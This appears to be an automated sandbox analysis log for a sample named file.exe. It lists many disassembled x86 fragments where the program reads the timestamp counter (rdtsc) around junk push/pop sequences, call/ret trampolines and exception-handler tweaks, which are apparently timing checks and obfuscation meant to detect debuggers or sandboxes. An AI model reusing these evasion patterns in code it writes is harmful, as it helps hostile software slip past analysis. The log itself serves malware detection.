Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E342 second address: A1E3E1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7D4C1B3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FF7D4C1B3A8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov ebx, 310FD333h 0x0000002e push dword ptr fs:[00000000h] 0x00000035 push esi 0x00000036 sbb ebx, 0F931A97h 0x0000003c pop edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov dword ptr [ebp+122D2E7Ch], edi 0x0000004a mov edi, dword ptr [ebp+12475F9Dh] 0x00000050 mov eax, dword ptr [ebp+122D0669h] 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007FF7D4C1B3A8h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 00000019h 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 jmp 00007FF7D4C1B3B1h 0x00000075 push FFFFFFFFh 0x00000077 stc 0x00000078 nop 0x00000079 jmp 00007FF7D4C1B3ACh 0x0000007e push eax 0x0000007f push edi 0x00000080 push ebx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F2AC second address: A1F2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A201F6 second address: A20208 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7D4C1B3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF7D4C1B3ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24F20 second address: A24FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FF7D4C1B428h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov bx, dx 0x0000002a jnc 00007FF7D4C1B426h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FF7D4C1B428h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e call 00007FF7D4C1B434h 0x00000053 add ebx, 6BF953EAh 0x00000059 pop edi 0x0000005a xchg eax, esi 0x0000005b push ebx 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24FA1 second address: A24FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 js 00007FF7D4C1B3B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A25FC4 second address: A25FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A25FC8 second address: A26045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF7D4C1B3B2h 0x0000000c jmp 00007FF7D4C1B3B0h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FF7D4C1B3B5h 0x00000019 nop 0x0000001a movzx ebx, si 0x0000001d push 00000000h 0x0000001f jnc 00007FF7D4C1B3ACh 0x00000025 sbb bl, FFFFFFCEh 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D221Ch], eax 0x00000030 xchg eax, esi 0x00000031 jns 00007FF7D4C1B3B4h 0x00000037 push eax 0x00000038 jl 00007FF7D4C1B3B0h 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27202 second address: A27206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27206 second address: A27213 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A28104 second address: A28108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A28108 second address: A2817B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 adc edi, 0EDBEE1Ch 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FF7D4C1B3A8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a or dword ptr [ebp+1244898Ch], edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007FF7D4C1B3A8h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+122D1D7Dh] 0x00000052 push ebx 0x00000053 mov bl, 05h 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 je 00007FF7D4C1B3ACh 0x0000005f jo 00007FF7D4C1B3A6h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24123 second address: A24127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A250CC second address: A250D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2518F second address: A251B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7D4C1B436h 0x00000008 jmp 00007FF7D4C1B430h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FF7D4C1B42Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A251B4 second address: A251B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A210F3 second address: A210F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A210F9 second address: A21199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FF7D4C1B3A8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a call 00007FF7D4C1B3B8h 0x0000002f jp 00007FF7D4C1B3ABh 0x00000035 sub bx, 0D67h 0x0000003a pop edi 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FF7D4C1B3A8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c xor edi, dword ptr [ebp+122D2AB3h] 0x00000062 mov eax, dword ptr [ebp+122D1425h] 0x00000068 mov ebx, 172CF155h 0x0000006d push FFFFFFFFh 0x0000006f xor di, EAF0h 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FF7D4C1B3ABh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21199 second address: A2119F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2119F second address: A211A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4556 second address: 9D4570 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7D4C1B426h 0x00000008 jno 00007FF7D4C1B426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 pop edi 0x00000013 jns 00007FF7D4C1B426h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4570 second address: 9D4591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF7D4C1B3A6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4591 second address: 9D4595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FB55 second address: A2FB59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FE4B second address: A2FE55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FE55 second address: A2FE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FE5B second address: A2FE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8845 second address: 9C884D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C884D second address: 9C885F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B42Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C885F second address: 9C886B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF7D4C1B3A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C886B second address: 9C887A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FF7D4C1B426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C3839 second address: 9C383F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C901 second address: A3C907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C907 second address: A3C917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FF7D4C1B3A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C917 second address: A3C93C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FF7D4C1B426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF7D4C1B439h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C93C second address: A3C96A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF7D4C1B3B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF7D4C1B3ADh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D195 second address: A3D199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D199 second address: A3D1BD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF7D4C1B3A6h 0x00000008 jmp 00007FF7D4C1B3B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D1BD second address: A3D1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D1C2 second address: A3D1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF7D4C1B3A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D487 second address: A3D48C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D48C second address: A3D49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FF7D4C1B3AAh 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D5D2 second address: A3D5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A14AF8 second address: A14AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A14F67 second address: A14F71 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7D4C1B426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A15082 second address: A150BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3B8h 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF7D4C1B3B2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A150BA second address: A150C4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7D4C1B426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1520B second address: A15211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A15211 second address: A1521E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF7D4C1B426h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1521E second address: A15241 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7D4C1B3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jnc 00007FF7D4C1B3ACh 0x00000012 nop 0x00000013 pushad 0x00000014 pushad 0x00000015 jg 00007FF7D4C1B3A6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A15241 second address: A1524B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F598B second address: 9F598F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F598F second address: 9F59B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF7D4C1B430h 0x0000000e jmp 00007FF7D4C1B431h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D1138 second address: 9D113C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A40F39 second address: A40F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FF7D4C1B435h 0x0000000d pop edx 0x0000000e jbe 00007FF7D4C1B433h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FF7D4C1B42Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A410F7 second address: A410FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A410FB second address: A41111 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF7D4C1B42Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A412AA second address: A412B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A412B1 second address: A412D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FF7D4C1B426h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF7D4C1B432h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A41586 second address: A41590 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF7D4C1B3ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A46F0B second address: A46F32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF7D4C1B438h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45BEF second address: A45BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45BF5 second address: A45BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45BF9 second address: A45C11 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7D4C1B3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FF7D4C1B3AEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 jl 00007FF7D4C1B3A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45D7A second address: A45D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45D7E second address: A45D84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45D84 second address: A45D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45D8D second address: A45D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45D92 second address: A45DBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF7D4C1B439h 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007FF7D4C1B426h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45DBF second address: A45DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45DC3 second address: A45DE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7D4C1B426h 0x00000008 jmp 00007FF7D4C1B430h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45DE3 second address: A45DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45DE9 second address: A45DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF7D4C1B426h 0x0000000a popad 0x0000000b jne 00007FF7D4C1B42Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45DFC second address: A45E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45E04 second address: A45E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A461C9 second address: A461CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A461CD second address: A461D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A458D7 second address: A458DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A46763 second address: A4676B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4676B second address: A46770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A46770 second address: A46786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7D4C1B426h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A46786 second address: A46794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A46794 second address: A4679A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4679A second address: A467A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A467A3 second address: A467AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF7D4C1B426h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A467AE second address: A467B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF7D4C1B3A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
